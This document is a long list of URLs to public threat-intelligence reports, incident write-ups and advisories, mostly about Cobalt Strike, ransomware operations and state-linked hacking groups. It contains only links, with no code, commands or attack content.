https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

http://www.secureworks.com/research/threat-profiles/gold-drake

https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929

https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://quake.360.cn/quake//reportDetail?id=5fc6fedd191038c3b25c4950

https://www.crowdstrike.com/blog/how-crowdstrike-threat-hunters-identified-a-confluence-exploit/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/

https://wbglil.gitbook.io/cobalt-strike/

https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/

https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire

https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/

https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html

https://www.secureworks.com/research/threat-profiles/bronze-president

https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel

https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware

https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/

https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/

https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/

https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf

https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/

https://assets.virustotal.com/reports/2021trends.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia

https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://thedfirreport.com/2021/01/31/bazar-no-ryuk/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3

https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader

https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/

https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt

https://blog.group-ib.com/REvil_RaaS

https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://community.riskiq.com/article/f0320980

https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/

https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/

https://www.esentire.com/blog/hacker-infrastructure-used-in-cisco-breach-discovered-attacking-a-top-workforce-management-corporation-russias-evil-corp-gang-suspected-reports-esentire

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://netresec.com/?b=214d7ff

https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/

https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt

https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://embee-research.ghost.io/ghidra-basics-shellcode-analysis/

https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811

https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon

https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md

https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html

https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

https://twitter.com/redcanary/status/1334224861628039169

https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575

https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns

https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.mandiant.com/media/10916/download

https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf

https://securelist.com/apt-luminousmoth/103332/

https://twitter.com/vikas891/status/1385306823662587905

https://thedfirreport.com/2022/04/25/quantum-ransomware/

https://marcoramilli.com/2022/05/10/a-malware-analysis-in-ru-au-conflict/

https://community.riskiq.com/article/0bcefe76

https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html

https://twitter.com/GossiTheDog/status/1438500100238577670

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta

https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/

https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/

https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20

https://asec.ahnlab.com/en/47455/

https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/

https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654

https://github.com/Apr4h/CobaltStrikeScan

https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html

https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf

https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf

https://twitter.com/RedDrip7/status/1402640362972147717?s=20

https://isc.sans.edu/diary/rss/28752

https://www.youtube.com/watch?v=y65hmcLIWDY

https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/

https://www.telsy.com/download/5972/?uid=d7c082ba55

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike

https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/

https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups

https://github.com/chronicle/GCTI

https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468

https://twitter.com/Unit42_Intel/status/1461004489234829320

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf

https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/

https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/

https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/

https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618

https://www.youtube.com/watch?v=pIXl79IPkLI

https://www.cynet.com/understanding-squirrelwaffle/

https://isc.sans.edu/diary/rss/27618

https://www.trendmicro.com/en_us/research/21/g/biopass-rat-new-malware-sniffs-victims-via-live-streaming.html

https://cert.gov.ua/article/339662

https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://unit42.paloaltonetworks.com/atoms/obscureserpens/

https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/

https://blogs.blackberry.com/en/2021/11/zebra2104

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://asec.ahnlab.com/ko/19860/

https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx

https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims

https://blog.talosintelligence.com/2021/05/ctir-case-study.html

https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear

https://www.secureworks.com/research/threat-profiles/bronze-riverside

https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/

https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html

https://www.darktrace.com/en/blog/catching-apt-41-exploiting-a-zero-day-vulnerability/

https://community.riskiq.com/article/c88cf7e6

https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/

https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

https://thedfirreport.com/2021/05/12/conti-ransomware/

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://rastamouse.me/ntlm-relaying-via-cobalt-strike/

https://www.malware-traffic-analysis.net/2021/09/17/index.html

https://blog.macnica.net/blog/2020/11/dtrack.html

https://therecord.media/mongolian-certificate-authority-hacked-eight-times-compromised-with-malware/

https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage

https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://content.fireeye.com/m-trends/rpt-m-trends-2020

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728

https://blogs.blackberry.com/en/2022/01/log4u-shell4me

https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html

https://twitter.com/Cryptolaemus1/status/1407135648528711680

https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/

https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/

https://redcanary.com/blog/gootloader

https://www.lac.co.jp/lacwatch/people/20180521_001638.html

https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/

https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/

https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/

https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf

https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489

https://www.scmagazine.com/brief/breach/novel-obfuscation-leveraged-by-hive-ransomware

https://paper.seebug.org/1301/

https://unit42.paloaltonetworks.com/cobalt-strike-team-server/

https://asec.ahnlab.com/ko/19640/

https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/

https://socprime.com/blog/somnia-malware-detection-uac-0118-aka-frwl-launches-cyber-attacks-against-organizations-in-ukraine-using-enhanced-malware-strains/

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/

https://www.mandiant.com/resources/defining-cobalt-strike-components

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://boschko.ca/cobalt-strike-process-injection/

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://www.varonis.com/blog/hive-ransomware-analysis

https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/

https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf

https://www.youtube.com/watch?v=XfUTpwZKCDU

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

https://mez0.cc/posts/cobaltstrike-powershell-exec/

https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b

https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/787/original/ransomware-chats.pdf

https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/

https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/

https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/

https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf

https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://blog.cobaltstrike.com/2020/11/06/cobalt-strike-4-2-everything-but-the-kitchen-sink/

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/

https://ti.qianxin.com/blog/articles/Operation-OceanStorm:The-OceanLotus-hidden-under-the-abyss-of-the-deep/

https://pylos.co/2018/11/18/cozybear-in-from-the-cold/

https://intel471.com/blog/conti-emotet-ransomware-conti-leaks

https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors

https://github.com/infinitumitlabs/Karakurt-Hacking-Team-CTI

https://news.sophos.com/en-us/2021/05/18/the-active-adversary-playbook-2021/?cmp=37153

https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/

https://us-cert.cisa.gov/ncas/alerts/aa21-148a

https://www.contextis.com/en/blog/dll-search-order-hijacking

https://embee-research.ghost.io/malware-analysis-decoding-a-simple-hta-loader/

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks

https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services

https://thedfirreport.com/2020/10/08/ryuks-return/

https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/

https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/

https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike

https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection

https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia

https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/

https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/

https://www.sentinelone.com/labs/chinese-entanglement-dll-hijacking-in-the-asian-gambling-sector/

https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e

https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/

https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://www.mandiant.com/resources/apt41-us-state-governments

https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass

https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf

https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/hydrochasma-asia-medical-shipping-intelligence-gathering

https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign

https://blog.fox-it.com/2023/11/01/popping-blisters-for-research-an-overview-of-past-payloads-and-exploring-recent-developments/

https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf

https://www.youtube.com/watch?v=gfYswA_Ronw

https://www.secureworks.com/research/threat-profiles/gold-kingswood

https://vanmieghem.io/blueprint-for-evading-edr-in-2022/

https://www.domaintools.com/resources/blog/covid-19-phishing-with-a-side-of-cobalt-strike#

https://securelist.com/apt-trends-report-q3-2020/99204/

https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot

https://embee-research.ghost.io/unpacking-malware-with-hardware-breakpoints-cobalt-strike/

https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf

http://www.secureworks.com/research/threat-profiles/gold-winter

https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/

https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/

https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections

https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/

https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html

https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e

https://malwarebookreports.com/cryptone-cobalt-strike/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf

https://isc.sans.edu/diary/28636

https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903

https://www.youtube.com/watch?v=ysN-MqyIN7M

https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/

https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue

https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine

https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://breakpoint-labs.com/blog/cobalt-strike-and-ransomware-tracking-an-effective-ransomware-campaign/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/

https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan

https://www.mandiant.com/resources/russian-targeting-gov-business

https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/

https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718

https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf

https://medium.com/walmartglobaltech/cobaltstrike-uuid-stager-ca7e82f7bb64

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos

https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/

https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike

https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/

https://twitter.com/MBThreatIntel/status/1412518446013812737

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems

https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html

https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html

https://twitter.com/swisscom_csirt/status/1354052879158571008

https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/

https://d01a.github.io/syscalls/

https://twitter.com/AltShiftPrtScn/status/1385103712918642688

https://www.breachquest.com/conti-leaks-insight-into-a-ransomware-unicorn/

https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists

https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/

https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations

https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/

https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware

https://cert.gov.ua/article/619229

https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html

https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/

https://www.ironnet.com/blog/ransomware-graphic-blog

https://thedfirreport.com/2023/12/04/sql-brute-force-leads-to-bluesky-ransomware/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.netresec.com/?page=Blog&month=2023-10&post=Forensic-Timeline-of-an-IcedID-Infection

https://blog.group-ib.com/colunmtk_apt41

https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/

https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my

https://news.sophos.com/en-us/2020/10/27/mtr-casebook-an-active-adversary-caught-in-the-act/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf

https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://twitter.com/elisalem9/status/1398566939656601606

https://isc.sans.edu/diary/rss/28934

https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/

https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/

https://www.mandiant.com/resources/unc2452-merged-into-apt29

